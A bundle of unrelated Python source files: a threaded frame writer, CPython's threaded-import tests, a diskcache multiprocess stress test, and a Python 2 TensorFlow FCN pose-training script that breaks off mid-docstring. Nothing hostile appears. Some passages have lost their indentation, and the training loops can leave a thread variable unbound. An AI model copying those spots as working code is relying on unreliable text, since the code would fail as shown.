
    def __exit__(self, type, value, traceback):
        if not self.placeholder:
            self.close()
            super().close()

    def init(self):
        """Start (or restart) the background writer thread with an empty buffer."""
        if self._running:
            self.close()
        # Clear the queue in place under its internal mutex.
        with self._buffer.mutex:
            self._buffer.queue.clear()
        with self._lock:
            self._running = True
            self._writer = Thread(target = self._write_async)
            self._writer.daemon = False
            self._writer.start()

    def close(self):
        """Signal the writer thread to stop and wait for it to drain the buffer."""
        with self._lock:
            self._running = False
            self._writer.join()

    def write(self, frame, title=None):
        """Enqueue a frame, spinning while the buffer is full; no-op once stopped."""
        if not self.placeholder:
            put_success = False
            while not put_success:
                if not self._running:
                    return
                try:
                    self._buffer.put_nowait((frame, title))
                except Full:
                    # Buffer full: retry until the writer thread drains it.
                    pass
                else:
                    put_success = True

    def _write_async(self):
        # Writer-thread loop: drain the buffer until stopped AND empty.
        while self._running:
            get_success = False
            while not get_success:
                if not self._running and self._buffer.empty():
                    return
                try:
                    frame, title = self._buffer.get_nowait()
                    super().write(frame, title)
                except Empty:
                    pass
                else:
                    get_success = True
|
test_threaded_import.py | # This is a variant of the very old (early 90's) file
# Demo/threads/bug.py. It simply provokes a number of threads into
# trying to import the same module "at the same time".
# There are no pleasant failure modes -- most likely is that Python
# complains several times about module random having no attribute
# randrange, and then Python hangs.
import _imp as imp
import os
import importlib
import sys
import time
import shutil
import threading
import unittest
from unittest import mock
from test.support import (
verbose, run_unittest, TESTFN,
forget, unlink, rmtree)
from test.support import threading_helper
def task(N, done, done_tasks, errors):
    """Worker body: import random/modulefinder (in alternating order) and record completion.

    Appends the thread id to *done_tasks*, collects any exception into
    *errors*, and sets *done* once N tasks have finished.
    """
    try:
        # We don't use modulefinder but still import it in order to stress
        # importing of different modules from several threads.
        odd_turn = bool(len(done_tasks) % 2)
        if odd_turn:
            import modulefinder
            import random
        else:
            import random
            import modulefinder
        # This will fail if random is not completely initialized
        x = random.randrange(1, 3)
    except Exception as exc:
        errors.append(exc.with_traceback(None))
    finally:
        done_tasks.append(threading.get_ident())
        if len(done_tasks) == N:
            done.set()
def mock_register_at_fork(func):
    """Decorate *func* so os.register_at_fork is mocked while it runs.

    bpo-30599: os.register_at_fork() offers no way to unregister callbacks,
    so importing random for real would leak memory; mock it instead.
    """
    patcher = mock.patch('os.register_at_fork', create=True)
    return patcher(func)
# Create a circular import structure: A -> C -> B -> D -> A
# NOTE: `time` is already loaded and therefore doesn't threaten to deadlock.
circular_imports_modules = {
'A': """if 1:
import time
time.sleep(%(delay)s)
x = 'a'
import C
""",
'B': """if 1:
import time
time.sleep(%(delay)s)
x = 'b'
import D
""",
'C': """import B""",
'D': """import A""",
}
class Finder:
    """A dummy meta-path finder that detects concurrent access to find_spec()."""

    def __init__(self):
        self.numcalls = 0               # total number of find_spec() invocations
        self.x = 0                      # read-modify-write counter; equals numcalls iff serialized
        self.lock = threading.Lock()

    def find_spec(self, name, path=None, target=None):
        """Simulate thread-unsafe state mutation around a deliberate sleep.

        If calls to find_spec() are properly serialized, `x` ends up equal
        to `numcalls`; otherwise not.
        """
        assert imp.lock_held()
        with self.lock:
            self.numcalls += 1
            snapshot = self.x
            time.sleep(0.01)
            self.x = snapshot + 1
class FlushingFinder:
    """A dummy meta-path finder which flushes sys.path_importer_cache when called."""

    def find_spec(self, name, path=None, target=None):
        # Invalidate cached per-path finders so path hooks run again on the
        # next import attempt.  Always "fails" to find anything (returns None).
        cache = sys.path_importer_cache
        cache.clear()
class ThreadedImportTests(unittest.TestCase):
    """Exercise the import machinery under heavy thread concurrency."""

    def setUp(self):
        # Force `random` to be imported from scratch by the worker threads.
        self.old_random = sys.modules.pop('random', None)

    def tearDown(self):
        # If the `random` module was already initialized, we restore the
        # old module at the end so that pickling tests don't fail.
        # See http://bugs.python.org/issue3657#msg110461
        if self.old_random is not None:
            sys.modules['random'] = self.old_random

    @mock_register_at_fork
    def check_parallel_module_init(self, mock_os):
        """Spawn batches of threads that all import the same modules at once."""
        if imp.lock_held():
            # This triggers on, e.g., from test import autotest.
            raise unittest.SkipTest("can't run when import lock is held")
        done = threading.Event()
        for N in (20, 50) * 3:
            if verbose:
                print("Trying", N, "threads ...", end=' ')
            # Make sure that random and modulefinder get reimported freshly
            for modname in ['random', 'modulefinder']:
                try:
                    del sys.modules[modname]
                except KeyError:
                    pass
            errors = []
            done_tasks = []
            done.clear()
            t0 = time.monotonic()
            with threading_helper.start_threads(
                    threading.Thread(target=task, args=(N, done, done_tasks, errors,))
                    for i in range(N)):
                pass
            completed = done.wait(10 * 60)
            dt = time.monotonic() - t0
            if verbose:
                print("%.1f ms" % (dt*1e3), flush=True, end=" ")
            dbg_info = 'done: %s/%s' % (len(done_tasks), N)
            self.assertFalse(errors, dbg_info)
            self.assertTrue(completed, dbg_info)
        if verbose:
            print("OK.")

    def test_parallel_module_init(self):
        self.check_parallel_module_init()

    def test_parallel_meta_path(self):
        """A meta-path finder must see serialized find_spec() calls."""
        finder = Finder()
        sys.meta_path.insert(0, finder)
        try:
            self.check_parallel_module_init()
            self.assertGreater(finder.numcalls, 0)
            self.assertEqual(finder.x, finder.numcalls)
        finally:
            sys.meta_path.remove(finder)

    def test_parallel_path_hooks(self):
        # Here the Finder instance is only used to check concurrent calls
        # to path_hook().
        finder = Finder()
        # In order for our path hook to be called at each import, we need
        # to flush the path_importer_cache, which we do by registering a
        # dedicated meta_path entry.
        flushing_finder = FlushingFinder()
        def path_hook(path):
            finder.find_spec('')
            raise ImportError
        sys.path_hooks.insert(0, path_hook)
        sys.meta_path.append(flushing_finder)
        try:
            # Flush the cache a first time
            flushing_finder.find_spec('')
            # Fix: the original bound the None return value to an unused
            # `numtests` variable, wrongly suggesting a meaningful result.
            self.check_parallel_module_init()
            self.assertGreater(finder.numcalls, 0)
            self.assertEqual(finder.x, finder.numcalls)
        finally:
            sys.meta_path.remove(flushing_finder)
            sys.path_hooks.remove(path_hook)

    def test_import_hangers(self):
        # In case this test is run again, make sure the helper module
        # gets loaded from scratch again.
        try:
            del sys.modules['test.test_importlib.threaded_import_hangers']
        except KeyError:
            pass
        import test.test_importlib.threaded_import_hangers
        self.assertFalse(test.test_importlib.threaded_import_hangers.errors)

    def test_circular_imports(self):
        # The goal of this test is to exercise implementations of the import
        # lock which use a per-module lock, rather than a global lock.
        # In these implementations, there is a possible deadlock with
        # circular imports, for example:
        # - thread 1 imports A (grabbing the lock for A) which imports B
        # - thread 2 imports B (grabbing the lock for B) which imports A
        # Such implementations should be able to detect such situations and
        # resolve them one way or the other, without freezing.
        # NOTE: our test constructs a slightly less trivial import cycle,
        # in order to better stress the deadlock avoidance mechanism.
        delay = 0.5
        os.mkdir(TESTFN)
        self.addCleanup(shutil.rmtree, TESTFN)
        sys.path.insert(0, TESTFN)
        self.addCleanup(sys.path.remove, TESTFN)
        for name, contents in circular_imports_modules.items():
            contents = contents % {'delay': delay}
            with open(os.path.join(TESTFN, name + ".py"), "wb") as f:
                f.write(contents.encode('utf-8'))
            self.addCleanup(forget, name)
        importlib.invalidate_caches()
        results = []
        def import_ab():
            import A
            results.append(getattr(A, 'x', None))
        def import_ba():
            import B
            results.append(getattr(B, 'x', None))
        t1 = threading.Thread(target=import_ab)
        t2 = threading.Thread(target=import_ba)
        t1.start()
        t2.start()
        t1.join()
        t2.join()
        self.assertEqual(set(results), {'a', 'b'})

    @mock_register_at_fork
    def test_side_effect_import(self, mock_os):
        """Importing a module whose top level spawns an importing thread must not deadlock."""
        code = """if 1:
            import threading
            def target():
                import random
            t = threading.Thread(target=target)
            t.start()
            t.join()
            t = None"""
        sys.path.insert(0, os.curdir)
        self.addCleanup(sys.path.remove, os.curdir)
        filename = TESTFN + ".py"
        with open(filename, "wb") as f:
            f.write(code.encode('utf-8'))
        self.addCleanup(unlink, filename)
        self.addCleanup(forget, TESTFN)
        self.addCleanup(rmtree, '__pycache__')
        importlib.invalidate_caches()
        __import__(TESTFN)
        del sys.modules[TESTFN]
@threading_helper.reap_threads
def test_main():
    """Run the suite with a tiny thread switch interval to provoke races."""
    old_interval = None
    try:
        old_interval = sys.getswitchinterval()
        sys.setswitchinterval(1e-5)
    except AttributeError:
        # Interpreter without a configurable switch interval.
        pass
    try:
        run_unittest(ThreadedImportTests)
    finally:
        # Restore the original interval so later tests run at normal speed.
        if old_interval is not None:
            sys.setswitchinterval(old_interval)
if __name__ == "__main__":
test_main()
|
stress_test_index_mp.py | """Stress test diskcache.persistent.Index."""
from __future__ import print_function
import itertools as it
import multiprocessing as mp
import os
import random
import time
import diskcache as dc
KEYS = 100
OPERATIONS = 10000
SEED = 0
# Pool of stress operations; an operation's weight grows with repeated registration.
functions = []

def register(function):
    """Add *function* to the stress-operation pool and return it (decorator-friendly)."""
    functions.append(function)
    return function
@register
def stress_get(index):
    """Read a random key with a default, so misses never raise."""
    target = random.randrange(KEYS)
    index.get(target, None)
@register
def stress_set(index):
    """Store a random float under a random key."""
    index[random.randrange(KEYS)] = random.random()
# Register the setter three extra times so writes dominate the operation mix.
register(stress_set)
register(stress_set)
register(stress_set)
@register
def stress_del(index):
    """Delete a random key, ignoring misses."""
    target = random.randrange(KEYS)
    try:
        del index[target]
    except KeyError:
        pass
@register
def stress_pop(index):
    """Pop a random key with a default, so misses never raise."""
    target = random.randrange(KEYS)
    index.pop(target, None)
@register
def stress_popitem(index):
    """Pop an item from either end at random, ignoring an empty index."""
    try:
        if random.randrange(2) == 0:
            index.popitem(last=False)
        else:
            index.popitem()
    except KeyError:
        pass
@register
def stress_iter(index):
    """Advance forward iteration over the index by at most five keys."""
    for _ in it.islice(index, 5):
        pass
@register
def stress_reversed(index):
    """Advance reverse iteration over the index by at most five keys."""
    head = it.islice(reversed(index), 5)
    for _ in head:
        pass
@register
def stress_len(index):
    """Query the index length (exercises the size code path)."""
    len(index)
def stress(seed, index):
    """Seed the RNG and apply OPERATIONS randomly chosen operations to *index*."""
    random.seed(seed)
    for _ in range(OPERATIONS):
        operation = random.choice(functions)
        operation(index)
def test(status=False):
    """Stress one shared Index from eight processes; poll once a second until all exit.

    With status=True, prints a one-line progress indicator while polling.
    """
    # Skip on CI services where multi-process disk stress is unreliable.
    if os.environ.get('TRAVIS') == 'true':
        return
    if os.environ.get('APPVEYOR') == 'True':
        return
    random.seed(SEED)
    index = dc.Index(enumerate(range(KEYS)))
    processes = []
    for num in range(8):
        proc = mp.Process(target=stress, args=(SEED + num, index))
        proc.start()
        processes.append(proc)
    for elapsed in it.count():
        time.sleep(1)
        if status:
            print('\r', elapsed, 's', len(index), 'keys', ' ' * 20, end='')
        if all(not proc.is_alive() for proc in processes):
            break
    if status:
        print('')
    # Every worker must have completed its operations without error.
    assert all(proc.exitcode == 0 for proc in processes)
# Run the stress test with live status output when invoked directly.
if __name__ == '__main__':
    test(status=True)
|
train.py | # --------------------------------------------------------
# FCN
# Copyright (c) 2016 RSE at UW
# Licensed under The MIT License [see LICENSE for details]
# Written by Yu Xiang
# --------------------------------------------------------
"""Train a FCN"""
from fcn.config import cfg
from gt_data_layer.layer import GtDataLayer
from gt_single_data_layer.layer import GtSingleDataLayer
from gt_synthesize_layer.layer import GtSynthesizeLayer
from utils.timer import Timer
import numpy as np
import os
import tensorflow as tf
import sys
import threading
import math
class SolverWrapper(object):
    """A simple wrapper around Caffe's solver.
    This wrapper gives us control over the snapshotting process, which we
    use to unnormalize the learned bounding-box regression weights.
    """
    def __init__(self, sess, network, imdb, roidb, output_dir, pretrained_model=None, pretrained_ckpt=None):
        """Initialize the SolverWrapper.

        network: the TF network object being trained
        imdb/roidb: dataset object and its region-of-interest database
        output_dir: directory where snapshots are written
        pretrained_model: optional numpy weights file loaded via net.load()
        pretrained_ckpt: optional TF checkpoint restored via self.restore()
        """
        self.net = network
        self.imdb = imdb
        self.roidb = roidb
        self.output_dir = output_dir
        self.pretrained_model = pretrained_model
        self.pretrained_ckpt = pretrained_ckpt
        # For checkpoint
        # Saver over all global variables, keeping at most 12 snapshots on disk.
        self.saver = tf.train.Saver(tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES), max_to_keep=12)
    def snapshot(self, sess, iter):
        """Take a snapshot of the network after unnormalizing the learned
        bounding-box regression weights. This enables easy use at test-time.
        """
        net = self.net
        if not os.path.exists(self.output_dir):
            os.makedirs(self.output_dir)
        # Optional infix from the config distinguishes snapshot families.
        infix = ('_' + cfg.TRAIN.SNAPSHOT_INFIX
                 if cfg.TRAIN.SNAPSHOT_INFIX != '' else '')
        filename = (cfg.TRAIN.SNAPSHOT_PREFIX + infix + '_iter_{:d}'.format(iter+1) + '.ckpt')
        filename = os.path.join(self.output_dir, filename)
        self.saver.save(sess, filename, write_meta_graph=False)
        print 'Wrote snapshot to: {:s}'.format(filename)
    def restore(self, session, save_file):
        """Restore from a checkpoint, skipping variables whose shapes differ.

        Variables named 'global_step' or containing 'Variable' are skipped,
        as are any whose saved shape does not match the graph's shape.
        """
        reader = tf.train.NewCheckpointReader(save_file)
        saved_shapes = reader.get_variable_to_shape_map()
        # Pairs of (full var name with ':0' suffix, bare checkpoint name),
        # restricted to variables that exist in the checkpoint.
        var_names = sorted([(var.name, var.name.split(':')[0]) for var in tf.global_variables()
                if var.name.split(':')[0] in saved_shapes])
        var_name_to_var = {var.name : var for var in tf.global_variables()}
        restore_vars = []
        restored_var_names = set()
        print('Restoring:')
        with tf.variable_scope(tf.get_variable_scope(), reuse=True):
            for var_name, saved_var_name in var_names:
                if 'global_step' in var_name:
                    continue
                if 'Variable' in var_name:
                    continue
                curr_var = var_name_to_var[var_name]
                var_shape = curr_var.get_shape().as_list()
                if var_shape == saved_shapes[saved_var_name]:
                    restore_vars.append(curr_var)
                    print(str(saved_var_name))
                    restored_var_names.add(saved_var_name)
                else:
                    print('Shape mismatch for var', saved_var_name, 'expected', var_shape, 'got', saved_shapes[saved_var_name])
        # Report checkpoint variables that were not restored into the graph.
        ignored_var_names = sorted(list(set(saved_shapes.keys()) - restored_var_names))
        if len(ignored_var_names) == 0:
            print('Restored all variables')
        else:
            print('Did not restore:' + '\n\t'.join(ignored_var_names))
        if len(restore_vars) > 0:
            saver = tf.train.Saver(restore_vars)
            saver.restore(session, save_file)
        print('Restored %s' % save_file)
    def train_model(self, sess, train_op, loss, learning_rate, max_iters, data_layer):
        """Network training loop (segmentation-only loss, with TF summaries)."""
        # add summary
        tf.summary.scalar('loss', loss)
        merged = tf.summary.merge_all()
        train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
        # intialize variables
        sess.run(tf.global_variables_initializer())
        if self.pretrained_model is not None:
            print ('Loading pretrained model '
                   'weights from {:s}').format(self.pretrained_model)
            self.net.load(self.pretrained_model, sess, True)
        print self.pretrained_ckpt
        if self.pretrained_ckpt is not None:
            print ('Loading pretrained ckpt '
                   'weights from {:s}').format(self.pretrained_ckpt)
            self.restore(sess, self.pretrained_ckpt)
        # Freeze the graph: any later op creation will raise.
        tf.get_default_graph().finalize()
        coord = tf.train.Coordinator()
        if cfg.TRAIN.VISUALIZE:
            # Synchronous feeding (blocks here); used for visual debugging.
            # NOTE(review): in this branch `t` is never bound, so the
            # coord.join([t]) below would raise if this call ever returned.
            load_and_enqueue(sess, self.net, data_layer, coord)
        else:
            # Producer thread keeps the input queue filled during training.
            t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
            t.start()
        last_snapshot_iter = -1
        timer = Timer()
        for iter in range(max_iters):
            timer.tic()
            summary, loss_value, lr, _ = sess.run([merged, loss, learning_rate, train_op])
            train_writer.add_summary(summary, iter)
            timer.toc()
            print 'iter: %d / %d, loss: %.4f, lr: %.8f, time: %.2f' %\
                    (iter+1, max_iters, loss_value, lr, timer.diff)
            if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
                print 'speed: {:.3f}s / iter'.format(timer.average_time)
            if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
                last_snapshot_iter = iter
                self.snapshot(sess, iter)
        # Final snapshot if the last iteration wasn't already snapshotted.
        if last_snapshot_iter != iter:
            self.snapshot(sess, iter)
        sess.run(self.net.close_queue_op)
        coord.request_stop()
        coord.join([t])
    def train_model_vertex(self, sess, train_op, loss, loss_cls, loss_vertex, loss_regu, learning_rate, max_iters, data_layer):
        """Network training loop with per-pixel class + vertex regression losses."""
        # add summary
        # tf.summary.scalar('loss', loss)
        # merged = tf.summary.merge_all()
        # train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
        # intialize variables
        sess.run(tf.global_variables_initializer())
        if self.pretrained_model is not None:
            print ('Loading pretrained model '
                   'weights from {:s}').format(self.pretrained_model)
            self.net.load(self.pretrained_model, sess, True)
        if self.pretrained_ckpt is not None:
            print ('Loading pretrained ckpt '
                   'weights from {:s}').format(self.pretrained_ckpt)
            self.restore(sess, self.pretrained_ckpt)
        tf.get_default_graph().finalize()
        coord = tf.train.Coordinator()
        if cfg.TRAIN.VISUALIZE:
            load_and_enqueue(sess, self.net, data_layer, coord)
        else:
            # Producer thread keeps the input queue filled during training.
            t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
            t.start()
        # tf.train.write_graph(sess.graph_def, self.output_dir, 'model.pbtxt')
        last_snapshot_iter = -1
        timer = Timer()
        for iter in range(max_iters):
            timer.tic()
            loss_value, loss_cls_value, loss_vertex_value, loss_regu_value, lr, _ = sess.run([loss, loss_cls, loss_vertex, loss_regu, learning_rate, train_op])
            # train_writer.add_summary(summary, iter)
            timer.toc()
            print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_regu: %.12f, lr: %.8f, time: %.2f' %\
                    (iter+1, max_iters, loss_value, loss_cls_value, loss_vertex_value, loss_regu_value, lr, timer.diff)
            if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
                print 'speed: {:.3f}s / iter'.format(timer.average_time)
            if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
                last_snapshot_iter = iter
                self.snapshot(sess, iter)
        if last_snapshot_iter != iter:
            self.snapshot(sess, iter)
        sess.run(self.net.close_queue_op)
        coord.request_stop()
        coord.join([t])
    def train_model_vertex_pose(self, sess, train_op, loss, loss_cls, loss_vertex, loss_pose, learning_rate, max_iters, data_layer):
        """Network training loop with class, vertex, and pose regression losses."""
        # add summary
        # tf.summary.scalar('loss', loss)
        # merged = tf.summary.merge_all()
        # train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
        coord = tf.train.Coordinator()
        if cfg.TRAIN.VISUALIZE:
            load_and_enqueue(sess, self.net, data_layer, coord)
        else:
            # Producer thread keeps the input queue filled during training.
            t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
            t.start()
        # intialize variables
        sess.run(tf.global_variables_initializer())
        if self.pretrained_model is not None:
            print ('Loading pretrained model '
                   'weights from {:s}').format(self.pretrained_model)
            self.net.load(self.pretrained_model, sess, True)
        if self.pretrained_ckpt is not None:
            print ('Loading pretrained ckpt '
                   'weights from {:s}').format(self.pretrained_ckpt)
            self.restore(sess, self.pretrained_ckpt)
        tf.get_default_graph().finalize()
        # tf.train.write_graph(sess.graph_def, self.output_dir, 'model.pbtxt')
        last_snapshot_iter = -1
        timer = Timer()
        for iter in range(max_iters):
            timer.tic()
            loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, lr, _ = sess.run([loss, loss_cls, loss_vertex, loss_pose, learning_rate, train_op])
            # train_writer.add_summary(summary, iter)
            timer.toc()
            print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_pose: %.4f, lr: %.8f, time: %.2f' %\
                    (iter+1, max_iters, loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, lr, timer.diff)
            if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
                print 'speed: {:.3f}s / iter'.format(timer.average_time)
            if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
                last_snapshot_iter = iter
                self.snapshot(sess, iter)
        if last_snapshot_iter != iter:
            self.snapshot(sess, iter)
        sess.run(self.net.close_queue_op)
        coord.request_stop()
        coord.join([t])
    def train_model_vertex_pose_adapt(self, sess, train_op, loss, loss_cls, loss_vertex, loss_pose, \
        loss_domain, label_domain, domain_label, learning_rate, max_iters, data_layer):
        """Training loop with the additional domain-adaptation loss and labels."""
        coord = tf.train.Coordinator()
        if cfg.TRAIN.VISUALIZE:
            load_and_enqueue(sess, self.net, data_layer, coord)
        else:
            # Producer thread keeps the input queue filled during training.
            t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
            t.start()
        # intialize variables
        sess.run(tf.global_variables_initializer())
        if self.pretrained_model is not None:
            print ('Loading pretrained model '
                   'weights from {:s}').format(self.pretrained_model)
            self.net.load(self.pretrained_model, sess, True)
        if self.pretrained_ckpt is not None:
            print ('Loading pretrained ckpt '
                   'weights from {:s}').format(self.pretrained_ckpt)
            self.restore(sess, self.pretrained_ckpt)
        tf.get_default_graph().finalize()
        last_snapshot_iter = -1
        timer = Timer()
        for iter in range(max_iters):
            timer.tic()
            loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, loss_domain_value, label_domain_value, domain_label_value, lr, _ = sess.run([loss, loss_cls, loss_vertex, loss_pose, loss_domain, label_domain, domain_label, learning_rate, train_op])
            # train_writer.add_summary(summary, iter)
            timer.toc()
            print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_pose: %.4f, loss_domain: %.4f, lr: %.8f, time: %.2f' %\
                    (iter+1, max_iters, loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, loss_domain_value, lr, timer.diff)
            # Dump the domain label tensors for inspection during adaptation.
            print label_domain_value
            print domain_label_value
            if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
                print 'speed: {:.3f}s / iter'.format(timer.average_time)
            if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
                last_snapshot_iter = iter
                self.snapshot(sess, iter)
        if last_snapshot_iter != iter:
            self.snapshot(sess, iter)
        sess.run(self.net.close_queue_op)
        coord.request_stop()
        coord.join([t])
    def train_model_det(self, sess, train_op, loss, loss_rpn_cls, loss_rpn_box, loss_cls, loss_box, loss_pose, learning_rate, max_iters, data_layer):
        """Training loop for the detection network (RPN + RCNN + pose losses)."""
        # add summary
        # tf.summary.scalar('loss', loss)
        # merged = tf.summary.merge_all()
        # train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
        # intialize variables
        sess.run(tf.global_variables_initializer())
        if self.pretrained_model is not None:
            print ('Loading pretrained model '
                   'weights from {:s}').format(self.pretrained_model)
            self.net.load(self.pretrained_model, sess, True)
        if self.pretrained_ckpt is not None:
            print ('Loading pretrained ckpt '
                   'weights from {:s}').format(self.pretrained_ckpt)
            self.restore(sess, self.pretrained_ckpt)
        tf.get_default_graph().finalize()
        coord = tf.train.Coordinator()
        if cfg.TRAIN.VISUALIZE:
            load_and_enqueue(sess, self.net, data_layer, coord)
        else:
            # Producer thread keeps the input queue filled during training.
            t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
            t.start()
        last_snapshot_iter = -1
        timer = Timer()
        for iter in range(max_iters):
            timer.tic()
            loss_value, loss_rpn_cls_value, loss_rpn_box_value, loss_cls_value, loss_box_value, loss_pose_value, lr, _ \
                = sess.run([loss, loss_rpn_cls, loss_rpn_box, loss_cls, loss_box, loss_pose, learning_rate, train_op])
            # train_writer.add_summary(summary, iter)
            timer.toc()
            print 'iter: %d / %d, loss: %.4f, loss_rpn_cls: %.4f, loss_rpn_box: %.4f, loss_cls: %.4f, loss_box: %.4f, loss_pose: %.4f, lr: %.8f, time: %.2f' %\
                    (iter+1, max_iters, loss_value, loss_rpn_cls_value, loss_rpn_box_value, loss_cls_value, loss_box_value, loss_pose_value, lr, timer.diff)
            if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
                print 'speed: {:.3f}s / iter'.format(timer.average_time)
            if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
                last_snapshot_iter = iter
                self.snapshot(sess, iter)
        if last_snapshot_iter != iter:
            self.snapshot(sess, iter)
        sess.run(self.net.close_queue_op)
        coord.request_stop()
        coord.join([t])
def get_training_roidb(imdb):
    """Returns a roidb (Region of Interest database) for use in training.

    When cfg.TRAIN.USE_FLIPPED is set, the dataset is first augmented in
    place with horizontally-flipped copies of every image.
    """
    if cfg.TRAIN.USE_FLIPPED:
        print 'Appending horizontally-flipped training examples...'
        imdb.append_flipped_images()
        print 'done'
    return imdb.roidb
def load_and_enqueue(sess, net, data_layer, coord):
    """Producer loop: pull blobs from the data layer and feed the net's input queue.

    Runs until the TF Coordinator requests a stop.  The feed_dict layout is
    selected by cfg.INPUT (which image modalities to feed) and by the
    cfg.TRAIN.SINGLE_FRAME / SEGMENTATION / VERTEX_REG_* flags (which
    targets the current network expects).
    """
    iter = 0
    while not coord.should_stop():
        # Fetch a new minibatch of blobs each pass.
        blobs = data_layer.forward(iter)
        iter += 1
        # Select the image tensor(s) to feed based on the input modality.
        if cfg.INPUT == 'RGBD':
            data_blob = blobs['data_image_color']
            data_p_blob = blobs['data_image_depth']
        elif cfg.INPUT == 'COLOR':
            data_blob = blobs['data_image_color']
        elif cfg.INPUT == 'DEPTH':
            data_blob = blobs['data_image_depth']
        elif cfg.INPUT == 'NORMAL':
            data_blob = blobs['data_image_normal']
        if cfg.TRAIN.SINGLE_FRAME:
            if cfg.TRAIN.SEGMENTATION:
                # Segmentation network: labels, plus vertex/pose targets when
                # vertex regression is enabled.
                if cfg.INPUT == 'RGBD':
                    if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
                        feed_dict={net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: 0.5, \
                                   net.vertex_targets: blobs['data_vertex_targets'], net.vertex_weights: blobs['data_vertex_weights'], \
                                   net.poses: blobs['data_pose'], net.extents: blobs['data_extents'], net.meta_data: blobs['data_meta_data']}
                    else:
                        feed_dict={net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: 0.5}
                else:
                    if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
                        feed_dict={net.data: data_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: 0.5, \
                                   net.vertex_targets: blobs['data_vertex_targets'], net.vertex_weights: blobs['data_vertex_weights'], \
                                   net.poses: blobs['data_pose'], net.extents: blobs['data_extents'], net.meta_data: blobs['data_meta_data'], \
                                   net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry']}
                    else:
                        feed_dict={net.data: data_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: 0.5}
            else:
                # Detection network: image info, gt boxes, poses, model points.
                if cfg.INPUT == 'RGBD':
                    feed_dict={net.data: data_blob, net.data_p: data_p_blob, net.im_info: blobs['data_im_info'], \
                               net.gt_boxes: blobs['data_gt_boxes'], net.poses: blobs['data_pose'], \
                               net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry'], net.keep_prob: 0.5}
                else:
                    feed_dict={net.data: data_blob, net.im_info: blobs['data_im_info'], \
                               net.gt_boxes: blobs['data_gt_boxes'], net.poses: blobs['data_pose'], \
                               net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry'], net.keep_prob: 0.5}
        else:
            # Multi-frame (recurrent) network: depth, state and weights blobs.
            if cfg.INPUT == 'RGBD':
                feed_dict={net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], \
                           net.depth: blobs['data_depth'], net.meta_data: blobs['data_meta_data'], \
                           net.state: blobs['data_state'], net.weights: blobs['data_weights'], net.points: blobs['data_points'], net.keep_prob: 0.5}
            else:
                feed_dict={net.data: data_blob, net.gt_label_2d: blobs['data_label'], \
                           net.depth: blobs['data_depth'], net.meta_data: blobs['data_meta_data'], \
                           net.state: blobs['data_state'], net.weights: blobs['data_weights'], net.points: blobs['data_points'], net.keep_prob: 0.5}
        # Blocks until the network's input queue has room.
        sess.run(net.enqueue_op, feed_dict=feed_dict)
def loss_cross_entropy(scores, labels):
    """Label-mass-normalized cross-entropy averaged over recurrent steps.

    scores: a list of tensors [batch_size, height, width, num_classes]
    labels: a list of tensors [batch_size, height, width, num_classes]
    """
    with tf.name_scope('loss'):
        loss = 0
        for step in range(cfg.TRAIN.NUM_STEPS):
            # Per-pixel cross-entropy, normalized by the total label mass.
            cross_entropy = -tf.reduce_sum(labels[step] * scores[step], reduction_indices=[3])
            loss += tf.div(tf.reduce_sum(cross_entropy), tf.reduce_sum(labels[step]))
        loss /= cfg.TRAIN.NUM_STEPS
        return loss
def loss_cross_entropy_single_frame(scores, labels):
    """Label-mass-normalized cross-entropy for a single frame.

    scores: a tensor [batch_size, height, width, num_classes]
    labels: a tensor [batch_size, height, width, num_classes]
    """
    with tf.name_scope('loss'):
        per_pixel = -tf.reduce_sum(labels * scores, reduction_indices=[3])
        # Small epsilon guards against division by zero on empty labels.
        return tf.div(tf.reduce_sum(per_pixel), tf.reduce_sum(labels) + 1e-10)
def loss_quaternion(pose_pred, pose_targets, pose_weights):
    """Weighted quaternion distance loss: 1 - <q_pred, q_target>^2, weight-averaged."""
    with tf.name_scope('loss'):
        dots = tf.reduce_sum(tf.multiply(pose_pred, pose_targets), reduction_indices=[1])
        distances = 1 - tf.square(dots)
        weights = tf.reduce_mean(pose_weights, reduction_indices=[1])
        weighted_sum = tf.reduce_sum(tf.multiply(weights, distances))
        return tf.div(weighted_sum, tf.reduce_sum(weights))
def train_net(network, imdb, roidb, output_dir, pretrained_model=None, pretrained_ckpt=None, max_iters=40000):
    """Train a Fast R-CNN network.

